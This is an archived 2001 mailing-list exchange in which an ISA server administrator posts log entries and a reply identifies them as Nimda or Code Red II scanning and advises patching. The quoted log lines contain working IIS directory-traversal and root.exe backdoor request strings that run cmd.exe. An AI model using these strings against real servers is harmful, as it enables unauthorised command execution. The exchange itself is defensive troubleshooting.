Re: attack on server?

  • From: "UESSE S.r.l." <uesse@xxxxxx>
  • To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
  • Date: Mon, 22 Oct 2001 17:59:15 +0200

That's a typical sequence of attempts from a server
infected by Nimda worm, or also Code Red II.

If you have your server patched with last Microsoft Updates,
you don't have nothing to worry about.

Otherwise, go and check www.microsoft.com/security

Danny

  ----- Original Message ----- 
  From: jose 
  To: [ISAserver.org Discussion List] 
  Sent: Monday, October 22, 2001 5:49 PM
  Subject: [isalist] attack on server?


  http://www.ISAserver.org


  hi all,

  i have installed on my isa server LANguard.

  on online monitoring i found followin messsages

  9:47:09 212.66.172.88 User: [unauthenticated] Size:3396B. 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
  9:47:09 212.66.172.88 User: [unauthenticated] Size:3396B. 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
  9:47:08 212.66.172.88 User: [unauthenticated] Size:3396B. 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
  9:47:08 212.66.172.88 User: [unauthenticated] Size:3396B. 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
  9:47:07 212.66.172.88 User: [unauthenticated] Size:3396B. 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
  9:47:06 212.66.172.88 User: [unauthenticated] Size:3396B. 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
  9:47:06 212.66.172.88 User: [unauthenticated] Size:225B. 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
  9:47:05 212.66.172.88 User: [unauthenticated] Size:3396B. 
/d/winnt/system32/cmd.exe?/c+dir
  9:47:05 212.66.172.88 User: [unauthenticated] Size:3396B. 
/MSADC/root.exe?/c+dir
  9:47:04 212.66.172.88 User: [unauthenticated] Size:3396B. 
/scripts/root.exe?/c+dir



  its attacks to server or what is it?

  thanks for every idea


  Josef Kovar
  Czech republic
  Europe
  ------------------------------------------------------
  You are currently subscribed to this ISAserver.org Discussion List as: 
uesse@xxxxxx
  To unsubscribe send a blank email to $subst('Email.Unsub')

Other related posts:

  1. Home
  2. isalist
  3. Archive
  4. 10-2001